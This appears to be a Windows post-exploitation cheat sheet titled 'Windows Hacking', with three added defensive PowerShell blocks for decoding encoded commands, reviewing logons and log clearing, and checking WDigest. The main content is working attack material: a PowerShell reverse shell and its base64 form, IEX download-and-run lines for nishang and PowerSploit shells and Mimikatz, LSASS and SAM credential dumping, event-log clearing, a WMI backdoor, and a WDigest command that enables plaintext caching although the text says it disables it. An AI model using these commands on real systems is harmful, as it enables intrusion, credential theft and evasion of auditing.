Windows Hacking

PowerShell reverse shell

$client = New-Object System.Net.Sockets.TCPClient("192.168.1.2",55555);$stream = $client.GetStream();[byte[]]$bytes = 0..255|%{0};$sendbytes = ([text.encoding]::ASCII).GetBytes("Windows PowerShell running as user " + $env:username + "`n");$stream.Write($sendbytes,0,$sendbytes.Length);while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2  = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()

PowerShell Base64 encoding

$Text = '$client = New-Object System.Net.Sockets.TCPClient("192.168.1.2",55555);$stream = $client.GetStream();[byte[]]$bytes = 0..255|%{0};$sendbytes = ([text.encoding]::ASCII).GetBytes("Windows PowerShell running as user " + $env:username + "`n");$stream.Write($sendbytes,0,$sendbytes.Length);while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2  = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()'
$Bytes = [System.Text.Encoding]::Unicode.GetBytes($Text)
$EncodedText =[Convert]::ToBase64String($Bytes)
$EncodedText > 1.txt

cat power.txt | iconv --to-code UTF-16LE | base64 -w 0    (Linux; -w 0 disables line wrapping, which -enc does not accept)

powershell -ep bypass -NoLogo -NonInteractive -NoProfile -enc "<contents of 1.txt>"
powershell -ep bypass -NoLogo -NonInteractive -NoProfile -enc {base64 string}
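Added example, not from the original page: the inverse of the encoding above, for triaging -enc command lines seen in process listings or 4688 events. The sample command line is constructed here; the prefix handling (-e, -ec, -en, -enc, ... -EncodedCommand) follows powershell.exe's unambiguous-prefix matching and PowerShell 3+ is assumed for Get-CimInstance.

```powershell
# Decode a powershell.exe -EncodedCommand argument: base64 -> UTF-16LE (Unicode), exactly
# the inverse of [Text.Encoding]::Unicode.GetBytes + ToBase64String used above.
function ConvertFrom-EncodedCommand {
    param([string]$CommandLine)
    if (-not $CommandLine) { return $null }
    # powershell.exe accepts any unambiguous prefix: -e, -ec, -en, -enc, ... -EncodedCommand.
    # -ep / -ExecutionPolicy do not fit this pattern, so "-ep bypass" is skipped.
    if ($CommandLine -match '(?i)(?:^|\s)-e(?:c|n[a-z]*)?\s+["'']?([A-Za-z0-9+/=]{8,})') {
        try { return [Text.Encoding]::Unicode.GetString([Convert]::FromBase64String($Matches[1])) }
        catch { return $null }   # not valid base64: leave it to the analyst
    }
    return $null
}

# Walk live processes and surface any encoded PowerShell together with its parent for triage.
function Find-EncodedPowerShell {
    Get-CimInstance Win32_Process -Filter "Name LIKE 'powershell%' OR Name LIKE 'pwsh%'" |
        ForEach-Object {
            $decoded = ConvertFrom-EncodedCommand ([string]$_.CommandLine)
            if ($decoded) {
                [pscustomobject]@{
                    ProcessId = $_.ProcessId
                    ParentId  = $_.ParentProcessId
                    Decoded   = $decoded
                }
            }
        }
}

# Constructed sample: a harmless payload encoded the same way as $EncodedText above.
$sample = 'powershell -ep bypass -NoLogo -NonInteractive -NoProfile -enc ' +
          [Convert]::ToBase64String([Text.Encoding]::Unicode.GetBytes('Get-Date'))
ConvertFrom-EncodedCommand $sample
Find-EncodedPowerShell | Format-List
```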

VBS download

' Usage: cscript <script>.vbs <url> <destination file>
Set args = Wscript.Arguments
Set http = CreateObject("WinHttp.WinHttpRequest.5.1")
http.Open "GET", args(0), False
http.Send
If http.Status <> 200 Then
    WScript.Echo "FAILED : HTTP Status " & http.Status
    WScript.Quit 1
End If
Set adoStream = CreateObject("ADODB.Stream")
adoStream.Open
adoStream.Type = 1                  ' adTypeBinary
adoStream.Write http.ResponseBody
adoStream.Position = 0
adoStream.SaveToFile args(1), 2     ' adSaveCreateOverWrite
adoStream.Close

Query remote desktop (RDP) connection history

reg query "HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Default"
reg query "HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Servers"
powershell IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/3gstudent/List-RDP-Connections-History/master/ListAllUsers.ps1');

PowerShell download

$client = new-object System.Net.WebClient
$client.DownloadFile('http://www.qq.com/robots.txt','D:\robots.txt')
powershell -Command "$client = New-Object 'System.Net.WebClient';$client.DownloadFile('http://download.sysinternals.com/files/PSTools.zip','D:\PSTools.zip')"

Log handling

wevtutil cl "windows powershell"
wevtutil cl "security"
wevtutil cl "system"
wmic nteventlog where LogfileName="Security" call cleareventlog
Get-EventLog "Security" -newest 100 | Where -FilterScript {$_.EventID -eq 4624 -and $_.ReplacementStrings[4].Length -gt 10}
Get-EventLog "Security" -newest 100 | Where -FilterScript {$_.EventID -eq 4624 -and $_.ReplacementStrings[4].Length -gt 10}  | Select-Object timegenerated,@{Name='TargetUserName'; Expression={$_.ReplacementStrings[5]}}, @{Name='WorkstationName'; Expression={$_.ReplacementStrings[1] -replace '\$$'}},@{Name='IpAddress';Expression={$_.ReplacementStrings[-2]}}
powershell -Command "Get-EventLog 'Security' -newest 100 | Where -FilterScript {$_.EventID -eq 4624} | select TimeGenerated"
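Added example, not from the original page: the same Get-EventLog / ReplacementStrings technique as the commands above, turned into a defender's review. It summarises network (type 3) and RDP (type 10) logons by account and source address, and lists the Security 1102 and System 104 events that wevtutil cl and wmic cleareventlog leave behind. Index positions follow the 4624 event data order; the $Newest defaults are constructed and PowerShell 3+ is assumed.

```powershell
# 4624 ReplacementStrings follow the event's data-field order:
# [5] TargetUserName [6] TargetDomainName [8] LogonType [11] WorkstationName [18] IpAddress
function Get-RemoteLogonSummary {
    param([int]$Newest = 2000)
    Get-EventLog -LogName Security -Newest $Newest |
        Where-Object { $_.EventID -eq 4624 -and $_.ReplacementStrings[8] -in @('3','10') } |
        ForEach-Object {
            [pscustomobject]@{
                Time        = $_.TimeGenerated
                User        = '{0}\{1}' -f $_.ReplacementStrings[6], $_.ReplacementStrings[5]
                LogonType   = $_.ReplacementStrings[8]          # 3 = network, 10 = RDP
                Workstation = $_.ReplacementStrings[11]
                IpAddress   = $_.ReplacementStrings[18]
            }
        } |
        Group-Object User, IpAddress |
        ForEach-Object {
            [pscustomobject]@{
                Count = $_.Count
                User  = $_.Group[0].User
                From  = $_.Group[0].IpAddress
                Last  = ($_.Group | Sort-Object Time -Descending)[0].Time
            }
        } | Sort-Object Count -Descending
}

# Clearing a log is itself logged: Security 1102 (audit log cleared) and System 104
# (any other log cleared, e.g. "windows powershell"). Their presence is the indicator.
function Get-LogClearEvents {
    param([int]$Newest = 5000)
    $sec = Get-EventLog -LogName Security -Newest $Newest | Where-Object { $_.EventID -eq 1102 }
    $sys = Get-EventLog -LogName System   -Newest $Newest | Where-Object { $_.EventID -eq 104 }
    @($sec) + @($sys) |
        Select-Object TimeGenerated, EventID, Source, Message |
        Sort-Object TimeGenerated -Descending
}

Get-RemoteLogonSummary | Format-Table -AutoSize
Get-LogClearEvents     | Format-Table -AutoSize -Wrap
```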

List startup items

wmic startup list brief
wmic startup get Command, User

List installed updates

wmic qfe get HotFixID, description, InstalledOn

Network adapter information

wmic nicconfig where IPEnabled='true' get DefaultIPGateway,DHCPServer,IPAddress,MacAddress

Process information

wmic process list brief

Batch-detect live hosts on the LAN

for /L %I in (1,1,254) DO @ping -n 1 192.168.1.%I | findstr "TTL=128"

List local users

wmic useraccount list brief
powershell Get-Childitem env:username

Service information

wmic service where State="Running" list brief

User settings

net user miked /time:M-F,08:00-17:00
net user miked /time:M-F,8AM-5PM
Allows user miked to log on Monday to Friday, 08:00 to 17:00 (M-F = Monday to Friday)

Dump administrator credentials

mimikatz.exe privilege::debug sekurlsa::logonpasswords exit
mimikatz.exe privilege::debug sekurlsa::logonpasswords exit | findstr "Username Password" | findstr /i /V "null local"
mimikatz.exe sekurlsa::minidump lsass.dmp sekurlsa::logonPasswords full

reg save hklm\sam d:\sam.hive
reg save hklm\system d:\system.hive
reg save hklm\security d:\security.hive

List local scheduled tasks

schtasks /query | findstr Ready

Ways to run PowerShell

Method 1: powershell IEX (New-Object Net.WebClient).DownloadString('http://xxxxx/xxx.ps1');
Method 2: Get-ExecutionPolicy
          Set-ExecutionPolicy Unrestricted
Import a module:
Import-Module .\xxxxx.ps1  or  . ".\xxx.ps1"

Other PowerShell scripts

Get hashes
IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/samratashok/nishang/master/Gather/Get-PassHashes.ps1');Get-PassHashes
Dump LSASS
powershell "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Exfiltration/Out-Minidump.ps1'); Get-Process lsass | Out-Minidump -DumpFilePath D:\tmp"
Get plaintext passwords: Mimikatz
IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/mattifestation/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1'); Invoke-Mimikatz
Reverse shell: TCP
IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/samratashok/nishang/master/Shells/Invoke-PowerShellTcp.ps1')
Reverse shell: UDP
IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/samratashok/nishang/master/Shells/Invoke-PowerShellUdp.ps1')
Reverse shell: ICMP
IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/samratashok/nishang/master/Shells/Invoke-PowerShellIcmp.ps1')

Once KB2871997 is installed, WDigest authentication can be disabled so that the system no longer keeps plaintext passwords in memory; mimikatz and wce then cannot recover plaintext passwords.
reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 1 /f
New-ItemProperty -Path HKLM:\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest -Name UseLogonCredential -Type DWORD -Value 1
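Added example, not from the original page: a check a defender can run to see which way this switch is currently set. The two commands above write UseLogonCredential = 1, which turns plaintext caching back on; 0 is the defensive value, and -Remediate writes it. The OS-default rule used here (an absent value means off from Windows 8.1 / Server 2012 R2, version 6.3, and on for older systems) and the PowerShell 3+ requirement are assumptions of this example.

```powershell
function Test-WDigestCaching {
    param([switch]$Remediate)   # -Remediate writes UseLogonCredential = 0 (the defensive setting)
    $key     = 'HKLM:\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest'
    $value   = (Get-ItemProperty -Path $key -Name UseLogonCredential -ErrorAction SilentlyContinue).UseLogonCredential
    $patched = [bool](Get-HotFix -Id KB2871997 -ErrorAction SilentlyContinue)
    # Assumption: 6.3 (Windows 8.1 / Server 2012 R2) and later default to caching off.
    $modern  = [Version](Get-CimInstance Win32_OperatingSystem).Version -ge [Version]'6.3'

    if ($null -ne $value) { $enabled = ($value -ne 0); $source = "explicit value $value" }
    elseif ($modern)      { $enabled = $false;         $source = 'OS default (value absent)' }
    else                  { $enabled = $true;          $source = 'legacy default (value absent)' }

    if ($Remediate -and $enabled -and ($modern -or $patched)) {
        # The value is only honoured once the KB (or a newer OS) provides the switch.
        Set-ItemProperty -Path $key -Name UseLogonCredential -Type DWord -Value 0
        $action = 'UseLogonCredential set to 0; applies to new logons after reboot'
    } elseif ($enabled -and -not ($modern -or $patched)) {
        $action = 'install KB2871997 first, then set UseLogonCredential to 0'
    } elseif ($enabled) {
        $action = 'set UseLogonCredential to 0 (rerun with -Remediate)'
    } else { $action = 'none' }

    [pscustomobject]@{
        PlaintextCachingEnabled = $enabled
        Source                  = $source
        KB2871997Installed      = $patched
        Action                  = $action
    }
}

Test-WDigestCaching
```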

WMI Backdoor

powershell IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/xorrior/RandomPS-Scripts/master/WMIBackdoor.ps1')
Set-WMIBackdoor -URL "http://xxx/shell.ps1" -Name "PWN" -TimeExecTrigger -TimeExecTime 300 # runs every 5 minutes
Remove-WMIBackdoor PWN

Archive / extract

powershell.exe -nologo -noprofile -command "& { Add-Type -A 'System.IO.Compression.FileSystem'; [IO.Compression.ZipFile]::ExtractToDirectory('x.zip', 'bar'); }"
powershell.exe -nologo -noprofile -command "& { Add-Type -A 'System.IO.Compression.FileSystem'; [IO.Compression.ZipFile]::CreateFromDirectory('foo', 'bar.zip'); }"
"C:\Program Files (x86)\WinRAR\Rar.exe" a -k -r -s -m3 d:\xxx.zip E:\www\

Find files

powershell.exe -nologo -noprofile -command "Get-ChildItem C:\inetpub\logs\LogFiles\ -recurse *.log"
powershell.exe -nologo -noprofile -command "Get-ChildItem D:\ | ForEach-Object -Process{ if($_ -is [System.IO.FileInfo] -and ($_.CreationTime -ge [System.DateTime]::Today)) { Write-Host($_.name,$_.CreationTime); } }"

Delete and copy files or directories

XCOPY D:\www D:\backup\ /S /E /Y
rd /s /q <directory>
del /f /s /q <file>
Remove-Item <file>

List IIS sites and virtual directories

C:\Windows\System32\inetsrv\appcmd list sites
C:\Windows\System32\inetsrv\appcmd list VDIR
